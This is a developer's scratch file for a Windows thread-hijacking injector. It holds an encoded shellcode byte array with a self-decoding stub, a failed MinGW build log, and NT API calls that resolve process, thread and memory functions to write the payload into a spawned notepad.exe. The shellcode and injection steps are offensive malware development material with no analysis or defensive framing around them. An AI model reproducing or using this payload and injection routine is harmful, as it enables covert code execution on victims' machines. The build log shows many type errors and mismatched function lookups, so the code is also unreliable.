SCRATCH


unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\xea\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\xb8\x43\x74\x07\x80\x3e\xea\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x14\x01\xea\xff\x26\x4f\x52\x4b\xb1\x4d"
"\xfd\xba\x74\xe9\x56\x4d\x52\x4a\x8b\x12\x31\x13\x49\xeb"
"\xc6\x5c\xfe\xd2\x67\x95\x3e\x26\xfd\x60\x06\x94\x3f\x4d"
"\x74\xfe\xea\xf2\xfe\xf5\xe9\xc0\xfe\xeb\xfe\x15\x15\x4d"
"\xeb\x27\x5b\x53\x5f\xb0\x5c\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\xe6\x5d\x74\x07\x80\x3e\x5c\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x14\x01\x5c\xff\x26\x4f\x52\x4b\xb1\xf6"
"\xfd\xba\x74\xe9\x56\x4d\x52\x4a\x8b\x12\x31\x13\x49\xeb"
"\xc6\x5c\xfe\xd2\x67\x95\x3e\x41\x75\x60\x06\x94\x3f\xf6"
"\x74\xfe\xea\xf2\xfe\xf5\xe9\xc0\xfe\xeb\xfe\x58\xe3\xb3"
"\x6a\x03\x1e\x07\xfd\x59\xb1\xf6\x38\xa5\x1a\x01\x1e\x06"
"\xc7\x5e\x7d\x5f\x05\xa7\x8a\x10\xb2\x9e\x2b\xd9\x72\x9e"
"\x55\x2c\x4a\xd8\x73\x59\x38\xb2\xa6\xbe\xb2\xb9\xa5\x8c"
"\xb2\xa7\xb2\xd6\x4c\x3d\xe4\x8d\x90\x89\x73\xd8\x3f\x78"
"\xb6\x2b\x94\x8f\x90\x88\x49\xd0\xf3\xd1\x8b\x29\x04\x9e"
"\x3c\x10\xa5\x57\xfc\x12\xb6\xa2\xc4\x56\xfd\xd8\xb6\x3c"
"\x28\x30\x3c\x37\x2b\x02\x3c\x29\x3c\x8e\xcd\x65\xbc\xd5"
"\xc8\xd1\x2b\x81\x67\x20\xee\x73\xcc\xd7\xc8\xd0\x11\x88"
"\xab\x89\xd3\x71\x5c\xc6\x64\x48\xfd\x0f\xa4\xf9\x43\xfa"
"\x9c\x0e\xa5\x81\xee\x64\x70\x68\x64\x6f\x73\x5a\x64\x71"
"\x64\x96\x94\x7d\xa4\xcd\xd0\xc9\x33\x89\x7f\x38\xf6\x6b"
"\xd4\xcf\xd0\xc8\x09\x90\xb3\x91\xcb\x69\x44\xde\x7c\x50"
"\xe5\x17\xbc\xab\x74\xe2\x84\x16\xbd\x89\xf6\x7c\x68\x70"
"\x7c\x77\x6b\x42\x7c\x69\x7c\xb5\x9c\x5e\x87\xee\xf3\xea"
"\x10\x40\x5c\x1b\xd5\x48\xf7\xec\xf3\xeb\x2a\xb3\x90\xb2"
"\xe8\x4a\x67\xfd\x5f\x73\xc6\x34\x9f\xba\x3d\xc1\xa7\x35"
"\x9e\x40\xd5\x5f\x4b\x53\x5f\x54\x48\x61\x5f\x4a\x5f\xb6"
"\x55\x5d\x84\xed\xf0\xe9\x13\x01\x5f\x18\xd6\x4b\xf4\xef"
"\xf0\xe8\x29\xb0\x93\xb1\xeb\x49\x64\xfe\x5c\x70\xc5\x37"
"\x9c\x98\x39\xc2\xa4\x36\x9d\x01\xd6\x5c\x48\x50\x5c\x57"
"\x4b\x62\x5c\x49\x5c\xa6\x14\x5a\xfb\x27\x57\x56\x4c\x59"
"\x4c\x4e\x7f\xa6\xb3\xa6\xf2\xf7\xf2\xf6\xe1\xee\x82\x74"
"\xd6\xee\x38\xf4\xd3\xee\x38\xf4\xab\xee\x38\xf4\x93\xf7"
"\xe5\xee\xbc\x11\xf9\xec\xfe\x97\x7a\xee\x38\xd4\xe3\xee"
"\x82\x66\x1f\x9a\xd2\xda\xb1\x8a\x93\xe7\x72\x6f\xbe\xe7"
"\xb2\x67\x51\x4b\xe1\xee\x38\xf4\x93\xe7\xe2\x2d\xf1\x9a"
"\xfb\xa7\x63\xc0\x32\xde\xab\xad\xb1\xa9\x36\xd4\xb3\xa6"
"\xb3\x2d\x33\x2e\xb3\xa6\xb3\xee\x36\x66\xc7\xc1\xfb\xa7"
"\x63\xf6\x38\xee\xab\xe2\x38\xe6\x93\xef\xb2\x76\x50\xf0"
"\xfb\x59\x7a\xeb\x82\x6f\xf2\x2d\x87\x2e\xfb\xa7\x65\xee"
"\x82\x66\x1f\xe7\x72\x6f\xbe\xe7\xb2\x67\x8b\x46\xc6\x57"
"\xff\xa5\xff\x82\xbb\xe3\x8a\x77\xc6\x7e\xeb\xe2\x38\xe6"
"\x97\xef\xb2\x76\xd5\xe7\x38\xaa\xfb\xe2\x38\xe6\xaf\xef"
"\xb2\x76\xf2\x2d\xb7\x2e\xf2\xfe\xfb\xa7\x63\xe7\xeb\xf8"
"\xea\xfc\xf2\xfe\xf2\xff\xf2\xfc\xfb\x25\x5f\x86\xf2\xf4"
"\x4c\x46\xeb\xe7\xea\xfc\xfb\x2d\xa1\x4f\xf8\x59\x4c\x59"
"\xee\x4e\xb8\xa6\xb3\xa6\xc6\xd5\xd6\xd4\x80\x94\x9d\xc2"
"\xdf\xca\xb3\xff\xf2\x1c\xff\xd1\x95\xa1\x4c\x73\xfa\x61"
"\x72\xa6\xb3\xa6\xb3\x4e\xb5\xa6\xb3\xa6\xdb\xc3\xdf\xca"
"\xdc\xa6\xe9\x4e\xb5\xa6\xb3\xa6\xdb\xc3\xdf\xca\xdc\xa6"
"\xf2\xfe\xfb\x97\x7a\xe7\x09\xe3\x30\xf0\xb4\x59\x66\xee"
"\x82\x6f\xf2\x1c\x43\x13\x11\xf0\x4c\x73\x8d\x2c\xaf\x28"
"\xbe\x61\xec\x56\x07\xa3\x8b\x40\x54\x60\xe6\x5d\x33\xe8"
"\xb8\x43";



====================[ Build | THREAD_EXE_HIJACK | Debug ]=======================
"C:\Program Files\JetBrains\CLion 2025.1.2\bin\cmake\win\x64\bin\cmake.exe" --build C:\Users\fallon\CLionProjects\thread_hijack_rp\cmake-build-debug --target THREAD_EXE_HIJACK -- -j 1
[ 50%] Building C object CMakeFiles/THREAD_EXE_HIJACK.dir/ntapi/main.c.obj
In file included from C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:2:
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.h:195:3: error: expected declaration specifiers or '...' before '[' token
  195 |   [in] PCWSTR pszFirst,
      |   ^
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.h:196:3: error: expected declaration specifiers or '...' before '[' token
  196 |   [in] PCWSTR pszSrch
      |   ^
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:12: warning: "THREAD_ALL_ACCESS" redefined
   12 | #define THREAD_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | SPECIFIC_RIGHTS_ALL)
      |
In file included from C:/Program Files/JetBrains/CLion 2025.1.2/bin/mingw/x86_64-w64-mingw32/include/minwindef.h:163,
                 from C:/Program Files/JetBrains/CLion 2025.1.2/bin/mingw/x86_64-w64-mingw32/include/windef.h:9,
                 from C:/Program Files/JetBrains/CLion 2025.1.2/bin/mingw/x86_64-w64-mingw32/include/windows.h:69,
                 from C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.h:2:
C:/Program Files/JetBrains/CLion 2025.1.2/bin/mingw/x86_64-w64-mingw32/include/winnt.h:4397: note: this is the location of the previous definition
 4397 | #define THREAD_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xffff)
      |
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c: In function 'GetModHandle':
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:92:21: warning: implicit declaration of function 'StrStrIW'; did you mean 'strstr'? [-Wimplicit-function-declaration]
   92 |                 if (StrStrIW(ln, data->FullDllName.Buffer)) {
      |                     ^~~~~~~~
      |                     strstr
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:95:36: warning: returning 'PVOID' {aka 'void *'} from a function with return type 'size_t' {aka 'long long unsigned int'} makes integer from pointer without a cast [-Wint-conversion]
   95 |                         return data->DllBase;
      |                                ~~~~^~~~~~~~~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c: In function 'main':
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:154:61: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  154 |         size_t ptr_CreateProcessA = (size_t)GetFuncAddr(mb, L"CreateProcessA");
      |                                                             ^~~~~~~~~~~~~~~~~
      |                                                             |
      |                                                             short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:155:71: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  155 |         size_t ptr_CreateToolhelp32Snapshot = (size_t)GetFuncAddr(mb, L"CreateToolhelp32Snapshot");
      |                                                                       ^~~~~~~~~~~~~~~~~~~~~~~~~~~
      |                                                                       |
      |                                                                       short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:156:61: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  156 |         size_t ptr_Process32First = (size_t)GetFuncAddr(mb, L"Process32First");
      |                                                             ^~~~~~~~~~~~~~~~~
      |                                                             |
      |                                                             short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:157:60: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  157 |         size_t ptr_Process32Next = (size_t)GetFuncAddr(mb, L"Process32Next");
      |                                                            ^~~~~~~~~~~~~~~~
      |                                                            |
      |                                                            short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:158:58: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  158 |         size_t ptr_CloseHandle = (size_t)GetFuncAddr(mb, L"CloseHandle");
      |                                                          ^~~~~~~~~~~~~~
      |                                                          |
      |                                                          short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:161:58: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  161 |         size_t ptr_NtOpenThread = (size_t)GetFuncAddr(kb,L"NtOpenThread");
      |                                                          ^~~~~~~~~~~~~~~
      |                                                          |
      |                                                          short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:162:61: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  162 |         size_t ptr_NtSuspendThread = (size_t)GetFuncAddr(kb,L"NtOpenThread");
      |                                                             ^~~~~~~~~~~~~~~
      |                                                             |
      |                                                             short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:163:64: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  163 |         size_t ptr_NtGetContextThread = (size_t)GetFuncAddr(kb,L"NtOpenThread");
      |                                                                ^~~~~~~~~~~~~~~
      |                                                                |
      |                                                                short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:164:69: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  164 |         size_t ptr_NtAllocateVirtualMemory = (size_t)GetFuncAddr(kb,L"NtOpenThread");
      |                                                                     ^~~~~~~~~~~~~~~
      |                                                                     |
      |                                                                     short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:165:66: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  165 |         size_t ptr_NtWriteVirtualMemory = (size_t)GetFuncAddr(kb,L"NtWriteVirtualMemory");
      |                                                                  ^~~~~~~~~~~~~~~~~~~~~~~
      |                                                                  |
      |                                                                  short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:166:65: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  166 |         size_t ptr_NtSetContextThread = (size_t)GetFuncAddr(kb, L"NtSetContextThread");
      |                                                                 ^~~~~~~~~~~~~~~~~~~~~
      |                                                                 |
      |                                                                 short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:167:61: warning: passing argument 2 of 'GetFuncAddr' from incompatible pointer type [-Wincompatible-pointer-types]
  167 |         size_t ptr_NtResumeThread = (size_t)GetFuncAddr(kb, L"NtResumeThread");
      |                                                             ^~~~~~~~~~~~~~~~~
      |                                                             |
      |                                                             short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:108:39: note: expected 'char *' but argument is of type 'short unsigned int *'
  108 | size_t GetFuncAddr(size_t modb, char* fn) {
      |                                 ~~~~~~^~
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:185:185: warning: passing argument 1 of '(BOOL (*)(const CHAR *, CHAR *, struct _SECURITY_ATTRIBUTES *, struct _SECURITY_ATTRIBUTES *, BOOL,  DWORD,  void *, const CHAR *, struct _STARTUPINFOA *, struct _PROCESS_INFORMATION *))ptr_CreateProcessA' from incompatible pointer type [-Wincompatible-pointer-types]
  185 |         BOOL proc =((BOOL(WINAPI*)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION))ptr_CreateProcessA)(L"C:\\Windows\\System32\\notepad.exe",NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi );
      |                                                                                                                                                                                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      |                                                                                                                                                                                         |
      |                                                                                                                                                                                         short unsigned int *
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:185:185: note: expected 'LPCSTR' {aka 'const char *'} but argument is of type 'short unsigned int *'
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:214:140: warning: passing argument 4 of '(NTSTATUS (*)(void *, void *, ULONG_PTR,  ULONG_PTR *, ULONG,  ULONG))ptr_NtAllocateVirtualMemory' makes pointer from integer without a cast [-Wint-conversion]
  214 |         status = ((NTSTATUS(NTAPI*)(HANDLE, PVOID, ULONG_PTR, PSIZE_T, ULONG, ULONG))ptr_NtAllocateVirtualMemory)(hThread, &baseAddress, n,sizeof(buf),n,n);
      |                                                                                                                                            ^~~~~~~~~~~
      |                                                                                                                                            |
      |                                                                                                                                            long long unsigned int
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:214:140: note: expected 'PSIZE_T' {aka 'long long unsigned int *'} but argument is of type 'long long unsigned int'
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:216:144: warning: passing argument 5 of '(NTSTATUS (*)(void *, void *, void *, SIZE_T,  ULONG_PTR *))ptr_NtWriteVirtualMemory' from incompatible pointer type [-Wincompatible-pointer-types]
  216 |         status = ((NTSTATUS(NTAPI*)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T))ptr_NtWriteVirtualMemory)(hThread, &baseAddress, &buf, sizeof(buf), &n);
      |                                                                                                                                                ^~
      |                                                                                                                                                |
      |                                                                                                                                                ULONG * {aka long unsigned int *}
C:\Users\fallon\CLionProjects\thread_hijack_rp\ntapi\main.c:216:144: note: expected 'PSIZE_T' {aka 'long long unsigned int *'} but argument is of type 'ULONG *' {aka 'long unsigned int *'}
mingw32-make[3]: *** [CMakeFiles\THREAD_EXE_HIJACK.dir\build.make:78: CMakeFiles/THREAD_EXE_HIJACK.dir/ntapi/main.c.obj] Error 1
mingw32-make[2]: *** [CMakeFiles\Makefile2:86: CMakeFiles/THREAD_EXE_HIJACK.dir/all] Error 2
mingw32-make[1]: *** [CMakeFiles\Makefile2:93: CMakeFiles/THREAD_EXE_HIJACK.dir/rule] Error 2
mingw32-make: *** [Makefile:130: THREAD_EXE_HIJACK] Error 2

	status = ((NTSTATUS(NTAPI*)(HANDLE, PVOID, ULONG_PTR, PSIZE_T, ULONG, ULONG))ptr_NtAllocateVirtualMemory)(hThread, &buf, n, usize,MEM_COMMIT,PAGE_READWRITE);

	status = ((NTSTATUS(NTAPI*)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T))ptr_NtWriteVirtualMemory)(hThread, NULL, &buf, sizeof(buf), NULL);
